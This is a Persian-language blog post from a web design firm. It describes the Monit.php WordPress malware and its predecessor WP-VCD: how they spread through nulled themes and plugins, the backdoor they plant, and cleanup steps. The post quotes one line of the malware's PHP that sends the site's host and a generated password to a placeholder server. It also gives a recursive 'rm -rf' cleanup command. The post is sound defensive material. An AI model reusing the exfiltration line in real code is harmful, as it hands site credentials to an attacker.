درخواست مشاوره رایگان

بدافزار وردپرس ۲۰۲۰ : Monit.php متخصص هک وردپرس شماست

  1. صفحه اصلی
  2. >
  3. مجله آموزشی
  4. >
  5. بدافزار وردپرس ۲۰۲۰ : Monit.php متخصص هک وردپرس شماست
Avatar

مهراد مظاهری

http://mazaheri.dev

من مهراد مظاهری برنامه نویس وب، طراح سایت با استفاده از سیستم مدیریت محتوای وردپرس و فعال در حوزه مدیریت شبکه ها و سرور های کامپیوتری می باشم

فهرست مطالب

    احتمالا درمورد هک وردپرس و بدافزار وردپرس در مقالات مجله آموزشی وبلینو مطالعه کرده بودید. اما امروز با یکی از مهم ترین بدافزار های وردپرس که حدود ۱ ماه است امنیت بسیاری از سایت های وردپرسی را تهدید کرده در خدمت شما هستیم. یکی از معروفترین و البته جدیدترین حمله ها به وردپرس که از طرف کلاه سیاه های سئو وردپرس برای آلوده کردن سایت ها و استفاده از آنها به عنوان درگاه جهت افزایش ترافیک سایتی که قصد بالا بردن رتبه سئو آن را دارند از طریق بدافزاری به اسم Monit.php انجام می شود. این بدافزار نسخه بروزرسانی شده ویروس WP-VCD است که از سال ۲۰۱۸ حسابی کاربران وردپرس فارسی را اذیت کرده بود.

    من مهراد مظاهری هستم و این یکی دیگر از مقالات مجله آموزشی تیم طراحی وب وبلینو می باشد. همراه من باشید تا نگاهی به این بدافزار جدید و بسیار دردسر ساز داشته باشیم.

    بدافزار وردپرس Monit در کجا قرار گرفته است؟

    بدافزار وردپرس 2020 : Monit.php متخصص هک وردپرس شماست
    کد داخلی بدافزار Monit.php در هاست وردپرسی
    بدافزار وردپرس 2020 : Monit.php متخصص هک وردپرس شماست
    خروجی نهایی بدافزار در سایت وردپرسی

     

    این بدافزار ( یا مالور یا Malware ) در مسیر wp-content/plugins/ به شکل یک فایل با پسوند PHP قرار می گیرد. ظاهر این فایل تا حد زیادی گمراه کننده است به طوری که نمیتوان تشخیص داد که واقعا این یک پلاگین است و یا یک فایل مخرب.

    شاید مهمترین نکته ای که بتواند کمکتان کند این است که بدانید پلاگین های وردپرس عمدتا ( نه ۱۰۰ درصد ولی ۹۰ درصد ) در داخل پوشه های مخصوص به خود و در زیر شاخه Plugins قرار می گیرند و پلاگین هایی که به صورت تنها در این دایرکتوری بدون یک پوشه واسط باشند تقریبا انگشت شمارند.

    طریق کار مالور وردپرس Monit چگونه است؟

    طریقه کار این بدافزار وردپرس دقیقا مشابه WP-VCD است. این بدافزار از یک Zone-id و یک فایل به نام apu.php استفاده می کند و با استفاده از این ۲ کد های جاوا اسکریپتی را در صفحات مختلف سایت صدا می زند. همه این کد های جاوا اسکریپت صرفا برای باز کردن ۲ لینک تبلیغاتی از ۲ سایت ofgogoatan و propu هستند. ( متاسفانه گوگل علاقه ای به دیدن آدرس این سایت ها ندارد و به همین دلیل ما نیز صرفا به نوشتن اسم سایت بسنده کرده ایم. ) این بدافزار از نظر فنی خیلی پیچیده نیست و عموما کدهای مخرب آن بدون اینکه کدگذاری شده باشند وارد هاست و سایت هدف می‌شوند.( کد گذاری نشدن فایل ها نکته بسیار خوبی است زیرا مراحل پاکسازی را راحت تر می کند. )

    پس از نصب قالب و یا پلاگین نال شده، ابتدا فایلی با نام class.plugin-modules.php و یا class.themes-modules.php ایجاد می‌شود. این حاوی اسکریپت اولیه این بدافزار وردپرس برای آلوده کردن سایت می‌باشد. بعد از فعال شدن این فایل، بدافزار وردپرس wp-vcd محتویات هاست را چک کرده و اسکریپت “back door” به functions.php هر پوسته‌ای که پیدا کند اضافه می‌کند.

    اسکریپت backdoor در ابتدا به صورت Base64 ذخیره شده است ولی قبل از وارد شدن به سایت کدگذاری آن باز می‌شود. اسکریپت همچنین برای جلوگیری از پیدا شدن توسط ادمین‌ها از modify شدن تاریخ و ساعت فایل جلوگیری می‌کند. بعد از ورود موفقیت‌آمیز اسکریپت backdoor، بدافزار با سرور اصلی خود تماس گرفته و URL سایت به علاوه پسوردی که ایجاد کرده است را برای آن ارسال می‌کند.

    این کار به حمله‌کننده اجازه دسترسی کامل به سایت را می‌دهد. ثبت نام سایت در سرور اصلی نیز از طریق HTTP GET و به صورت زیر انجام می‌شود:

    $content [email protected]_get_contents(‘http://example.com/post.php?host=’ .$_SERVER[“HTTP_HOST”] . ‘&password=’ . $install_hash);

    بعد از ورود کد backdoor بدافزار اقدام به جستجو دیگر سایت‌های وردپرسی که ممکن است روی هاست و یا سرور قرار داشته باشند می‌کند و همین مراحل را مجددا برای سایت‌های جدیدی که پیدا کرده طی می‌کند.

    سپس مرحله دوم نفوذ از طریق اسکریپت جدید که در مسیر wp-includes/wp-vcd.php​ قرار دارد صورت می‌گیرد. بدافزار فایل اصلی و سالم وردپرس که در مسیر wp-includes/post.php قرار دارد را ادیت می‌کند تا هر بار که صفحه سایت لود شد، کدهای درون فایل wp-vcd.php که مخرب می‌باشد در داخل فایل post.php اجرا شود.

    این مالور وردپرسی دقیقا به یک منظور طراحی شده است. هک سایت وردپرسی و دزدیدن ترافیک آن در جهت بالا بردن رتبه سایتهایی که در بالا ذکر کردم. در نسخه های قبلی این بدافزار وردپرسی دامنه krilns هم جزو دامنه هایی بود که جهت مقاصد طراحان این بدافزار استفاده می شد.

    آشنایی با WP-VCD ، پدر بدافزار امروزی Monit

    بدافزار WP-VCD به راحتی می تواند لقب کرونا ویروس وردپرس را به خود اختصاص دهدچرا که طی چند ماه گذشته شیوع بسیار زیادی داشته است. این بدافزار وردپرسی و فرزندش Monit.php هر ۲ جز بدافزارهای خطرناکی می‌باشند که بسیاری از سایت‌های وردپرس ایرانی را نیز مورد هدف قرار داده است.

    شیوع بدافزار WP-VCD از طریق پلاگین و یا پوسته‌های نال شده که از منابع غیر معتبر تهیه شده‌اند صورت می‌گیرد. حمله‌کنندگان پس از ورود به سایت با استفاده از تکنیک‌های کلاه سیاه سئو اقدام به ریدایرکت بازدیدهای سایت به سوی مسیرهای دیگری می‌کنند و می‌تواند باعث از دسترس خارج شدن سایت و یا تغییر مسیر و ریدایرکت شدن سایت وردپرسی شما به مقاصد نامعلومی شود که نتیجه ای جز فیلتر شدن سایت وردپرسی عزیز و یا اتفاقات بدتر نخواهد داشت.

    بدافزار Monit اما کمی از نواده خود پیشرفته تر بوده و می تواند از طریق هسته وردپرس به سایت وارد شود. متاسفانه وردپرس هایی که نسخه آنها از ۵.۱ پایین تر است مستعد هستند و هک وردپرس توسط Monit در این نسخه ها قابل پیش بینی است.

    منابع شیوع WP-VCD و Monit کجا هستند؟

    در حالت کلی می توان گفت وبسایت های خوش رنگ و لعابی که قالب و پلاگین های غیر رایگان را به رایگان در اختیار شما قرار می دهند منبع اصلی این آلودگی هستند. یک مثال ساده برایتان می زنیم. اگر عبارت “eduma theme download” را جستجو کنید یکی از اولین نتایج سایتی با نام downloadfreethemes.co نمایش داده می شود که یکی از منابع اصلی پخش این بدافزار وردپرس است. نکته بدتر این است که این سایت ها عموما رتبه های بالایی دارند به همین دلیل اگر آگاهی قبلی نسبت به این بدافزار های وردپرس نداشته باشید احتمالا فریب رتبه گوگل این وبسایت هارا خواهید خورد.

    پیشگیری و رفع مشکلات Monit.php و WP-VCD چگونه است؟

    خوشبختانه در دنیای طراحی سایت و علوم مهندسی پیشگیری و یا رفع مشکل و درمان آن مانند علم پزشکی نیست و برعکس ویروس کرونا ، بدافزار وردپرس Monit با روش های ساده ای از سایت وردپرسی شما حذف می شود و با انجام چند عمل بسیار ساده دیگر هم می توانید از ابتلای دوباره سایت وردپرسی خود به آن جلوگیری کنید.

     

    حل مشکلات ایجاد شده توسط Monit.php

    ابتدا به مسیر پلاگین های خود سر بزنید و هرجا فایلی به نام Monit.php را مشاهده کردید آن را پاک کنید. دقت داشته باشید که وقتی فایل monit.php را باز می کنید توضیحاتی بسیار قانع کننده ! درباره پلاگین Monitorization سئو وردپرس خواهید دید که نویسنده پلاگین را هم یک برنامه نویس روسی مشهور معرفی کرده است. فریب این چیزهارا نخورید زیرا تولید کنندگان پلاگین وردپرسی هم مثل شما و من از بدافزار Monit وردپرس اطلاع دارند و اساسا اسم فایل های پلاگین خود را monit.php نمی گذارند. بنابراین هرجا این فایل را دیدید سریعا پاک کنید.

    اگر به ترمینال و یا کنسول سرور و یا هاست خود دسترسی دارید می توانید به راحتی با دستور زیر این کار را انجام دهید

    find /var/www/html/ -name monit.php -exec rm -rf {} \;

    از آنجاییکه در نسخه های قدیم بدافزار WP-VCD دیتابیس هم آلوده می شد این امکان در بدافزار Monit هم وجود دارد به همین منظور استفاده از کوئری زیر در دیتابیس می تواند مشکل شمارا حل کند.

    بدافزار وردپرس 2020 : Monit.php متخصص هک وردپرس شماست
    وجود بدافزار Monit در جدول wp_options در وردپرس

    SELECT * FROM `wp_options` WHERE `option_name` IN ( ‘default_mont_options’, ‘ad_code’ , ‘hide_admin’, ‘hide_logged_in’ , ‘display_ad’, ‘search_engines’ , ‘auto_update’, ‘ip_admin’ , ‘cookies_admin’, ‘logged_admin’, ‘log_install’)

    حل مشکلات ایجاد شده توسط WP-VCD هم تقریبا به همین منوال است. تفاوت کوچکی که بین این ۲ وجود دارد مسیرهای آلوده کردن فایل های وردپرس است.

    یک پیشنهاد ساده و البته سریع برای پیدا کردن مشکل استفاده از افزونه امنیتی Wordfence است که می تواند به راحتی فایل های Monit و WP-VCD را در هر دایرکتوری از وردپرس که مخفی شده باشند پیدا کرده و از بین ببرد ( به شرطی که به آخرین نسخه آپدیت شده باشد.)

    همچنین همانند باقی مقالات مجله آموزشی وبلینو، به شما توصیه اکید داریم که از قالب های وردپرس و پلاگین وردپرس نال شده استفاده نکنید و تا حد امکان قالب سایت وردپرس خود را از مراجع و منابع معتبر همراه با لایسنس اورجینال تهیه کنید که بتوانید به صورت دوره ای و البته منظم آنهارا آپدیت کنید.

    نظر خود را بیان کنید

    نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

    داستان شکل گیری وبلینو تیم به ابتدای دهه 90 شمسی بازمیگردد. وبلینو تیم در آن زمان تحت عنوان گروه نرم افزاری وبلینو با ارائه خدمات توسعه نرم افزار های سازمانی توانست نرم افزار های ارزنده ای در حوزه های اداری پدید آورد. فضای کسب و کار آنلاین و تجاربی که در برنامه نویسی نرم افزار اندوختیم باعث شد که پس از متی در حوزه طراحی وبسایت و وب اپلیکیشن فعالیت خود را ادامه دهیم.

    اطلاعات تماس با وبلینو

    تمامی حقوق مادی و معنوی این وب سایت متعلق به وبلینو می باشد.